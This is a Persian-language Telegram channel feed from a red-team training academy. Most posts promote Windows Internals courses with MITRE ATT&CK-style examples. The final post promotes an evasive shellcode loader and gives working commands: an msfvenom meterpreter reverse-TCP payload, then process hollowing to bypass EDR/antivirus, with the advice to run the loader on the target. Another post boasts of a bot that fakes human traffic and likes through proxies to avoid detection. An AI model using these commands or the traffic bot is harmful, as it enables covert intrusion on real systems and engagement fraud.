RedTeamAPT Academy
1.62K subscribers
37 photos
18 videos
47 links
Topics:
Red team (NetWork)❗️
coding(c,python,powershell,bash)🧑‍💻
Phishing 👂
Penetration testing 👁
vulnerability 🦠
Group : @RedTeamAcademyChat
Admin : @RedTeamAdmin1

این کانال برای مباحث آموزشی میباشد و جنبه تخریب و اتک ندارد .
Download Telegram
Channel created
ما یکمقدار صبر میکنیم تا دوستان بیشتر بشن
تا شروع کنیم مجدد به فعالیت .
تا اون موقع یک راهی برای نشر مطالب پیدا میکنیم که به عنوان عامل مخرب شناخته نشه .
ارادت
RedTeam Group : @RedTeamAcademyChat
تا بارگذاری تمامی ویدیو ها ، مشخصات و توضیحات در سایت ، برای دسترسی سریع و آسان تر ویدیو ها در کانال بله بارگذاری شده است
کانال بله :
https://ble.ir/RedTeamAPT
سلام به همه دوستان !

سایت تا آخر این هفته با کلی تغییرات دوباره بالا میاد! این آپدیت‌ها رو داشتیم:

تکنیک‌ها و متدها کاملاً آپدیت شدن.
ساختار سایت رو با تغییرات جدید MITRE ATT&CK هماهنگ کردیم.
طراحی و سئوی سایت رو بهبود دادیم تا راحت‌تر ازش استفاده کنید.
همه ویدیوها رو روی خود سایت میذاریم که دیگه نگران بسته شدن کانال تلگرام نباشیم!
یه خبر مهم دیگه: بعد از اینکه دوره Windows Internals تموم بشه، یه دوره کاربردی و جدید بر اساس MITRE ATT&CK داریم.

@RedTeamAcademy
یکی از اهدافی که داریم برای سایت در قسمت mitre attack مثالهایی از تکنیک ها هست
ساده و جوری که مخرب نباشه ، اگرم بود راحت شناسایی بشه
برای مثال با پایتون ریورس شل نوشتیم و قرار دادیم
تا در بخش T1059.006: Python شما درک مطلب کاملی داشته باشید
ولی مثال های عملی تر و پیشرفته تر در دوره ها بیان میشه .

@RedTeamAcademy
سلام وقت عزیزان بخیر
سایت مجدد در دسترس قرار گرفت
دوره های آموزشی
و اتک های مایتره
https://redteamapt.ir/
Media is too big
VIEW IN TELEGRAM
بخشی از دوره Windows Internal فصل 3

Process
Token
PrimaryToken
ImpersonationToken

فصل 1 و 2 منتشر شده است .

پیش نیاز : دوره ردتیم و اشنایی با c , c++

@RedTeamAcademy
سلام وقت بخیر
نمونه ویدیو آموزشی windows internal فصل ۳ در سایت بارگزاری شد . (اخرین ویدیو صفحه)
بدون vpn سایت رو باز کنید.

ویدیو در رابطه با ساختار
Reverse shell att&ck
PPID ATT&CK
Startupinfo
Startupinfoex
Example c++ code

https://redteamapt.ir/course/%d8%af%d9%88%d8%b1%d9%87-%d8%a2%d9%85%d9%88%d8%b2%d8%b4%db%8c-windows-internal/
با سلام و عرض ادب
به علت طولانی بودن و حجم بالای مطالب Windows Internal ، طی 6 مرحله دوره منتشر میشه
قیمت اصلی دوره بین هر فصل تقسیم میشود (اگر قیمت دوره 6 میلیون تومان باشد قیمت هر بخش 1 میلیون تومان میباشد که از لحاظ اقتصادی برای دوستان بهتر هست و فشار سنگین دوره نهایی و خرید کلی رو نداشته باشند ، قیمت دوره پس از انتشار اعلام میشود)

نحوه انتشار دوره Windows Internal :
فصل 1 و 2 : Concepts and tools , System architecture
فصل 3 : Processes and jobs
فصل 4 : Threads
فصل 5 : Memory management
فصل 6 : I/O system
فصل 7 : Security

این کار به علت این است که عزیزان بتوانند طی بازه هایی که زمان هست تا انتشار فصل بعدی فرصت مطالعه داشته باشند و تست های بسیاری در هر فصل وجود دارد به همراه کد هایی که در هر تست انجام میشه .
هر بخش حدود بین 100 تا 150 صفحه از کتاب هست .
دوره شامل سرفصل ها و تیتر های اصلی کتاب هست و تا حد ممکن کامل تر نیز شده است
در تمام دوره ما مثال و توضیحات Red Team و attack میزنیم .
کل دوره بین 80 تا 100 ساعت هست .

اگر استقبال ازین دوره خوب باشه در نظر دارم دوره هایی که تو ایران (اصلا نیست) و جهان اصلا شاید پیدا نکنید برگزار کنم :

Windows Internals Part 2
Windows 10 System Programming, Part 1
Windows 10 System Programming, Part 2
Windows Kernel Programming
windows-via-C and C++


فصل 1 و 2 دوره منتشر شده دوستان میتوانند از لینک زیر نمونه ویدیو های دوره ببینید (بدون VPN)

دوره آموزشی Windows Internal

فصل 3 در اواسط ضبط هستش و احتمالا تا اوایل ماه دیگه منتشر بشه

دوره های آموزشی اکادمی RedTeamAPT

——————-
@RedTeamAcademy
This media is not supported in your browser
VIEW IN TELEGRAM
بخشی از دوره Windows Internal فصل 3

به جرات میتونم بگم فصل 3 پر از نکته های این شکلی هست

دوستان BlueTeam , Red Team , Soc این ویدیو رو از دست ندید

فصل 1 و 2 دوره منتشر شده است

@RedTeamAcademy
تمامی کد ها و نوت ها ب دوستان تو همه دوره ها ارسال میشه
مخصوصا Windows Internal که بتونن روی کد ها کار کنن و متوجه ساختار بشن و .... !!!
دوستانی که تهیه کردند متوجه هستند که این کد ها پیاده سازی ..... هستند حتی کدی که در ادامه برای همین ویدیو تست میشه !!!

@RedTeamAcademy
دیشب داشتم روی یه چیزی کار میکردم با پایتون
خودش میره رفتار انسان رو هر سایتی بخواییم شبیه سازی میکنه
کلید میکنه
اسکرول میکنه
جایی نیاز باشه میره پست یا ویدیویی رو لایک میکنه
بازدید میفرسته
از گوگل با این کلمه کلیدی ( مثلا : آموزش آشپزی 😅) وارد این سایت بشه
میتونید مدیریت ترد رو داشته باشید برای سرعت بیشتر
پراکسی تعریف کنید برای لو نرفتن
روی هر چنتا لینک و سایت و ....

بماند که من این رو برای یه کاری درست کردم😎

@RedTeamAcademy
Media is too big
VIEW IN TELEGRAM
RedTeam 🔴 vs 🔵 BlueTeam

دوستانی که دنبال مباحث پیشرفته (APT) هستند میتوانند این ویدیو رو که بخشی از فصل سوم دوره Windows Internal هست رو مشاهده کنند .

@RedTeamAcademy
جنگ واقعی RedTeam و BlueTeam اینجا رخ میده .
بخشی از دوره Windows Internal فصل 3

دوره آموزشی Windows Internal

@RedTeamAcademy
Media is too big
VIEW IN TELEGRAM

قانون تغییرناپذیری (Immutability) :

تمام فیلدهای درون یک توکن به دلیل قرار داشتن در حافظه کرنل کاملاً غیرقابل تغییر (Immutable) هستند. هیچ‌کدام از امتیازات یا SIDها از لایه کاربر (User Mode) قابل دستکاری نیستند، مگر از طریق سیستم‌کال‌های رسمی و مجاز که خود سیستم‌عامل برای این کار تعبیه کرده است.

رد تیمر : 👀


👇مشاهده دوره های آموزشی

🔗 https://redteamapt.ir/course/

@RedTeamAcademy 🚫

@RedTeamAcademy
🔴 لودر شل‌کد فوق‌العاده گریزناپذیر برای Red Team

یک ابزار قدرتمند و نسبتاً جدید در حوزه Red Team که اخیراً توجه زیادی جلب کرده، Rattle هست. این ابزار یک Shellcode Loader Generator بسیار evasive محسوب می‌شه که مخصوص عملیات نفوذ و دور زدن تشخیص EDR/AV طراحی شده. هدف اصلیش اجرای شل‌کد دلخواه با حداقل ردپا و حداکثر پنهان‌کاری در سیستم هدف است.

قابلیت‌های کلیدی:
- تولید لودرهای شل‌کد گریزناپذیر با تکنیک‌های پیشرفته تزریق و بارگذاری حافظه
- پشتیبانی از روش‌های تزریق متنوع: Process Hollowing ، Remote Process Injection و تخصیص حافظه سفارشی
- مبهم‌سازی (Obfuscation) قوی شل‌کد و منطق لودر برای سخت کردن تحلیل استاتیک و دینامیک
- تکنیک‌های پیشرفته دور زدن EDR/AV شامل Direct Syscalls* ، *Dynamic Unhooking*، Memory Encryption و ...
- نوشته‌شده با C/C++
برای کنترل سطح پایین و عملکرد بهینه

نحوه استفاده:


msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=... LPORT=... -f raw -o payload.bin

.\Rattle.exe -s payload.bin -t hollow -o loader.exe

# -e : فعال‌سازی encryption
# -u : فعال‌سازی unhooking


لودر تولیدشده (loader.exe) رو روی هدف اجرا کنید و لذت ببرید! 🚀

---

🆔 @RedTeamAcademy
🌐 https://redteamacademy.ir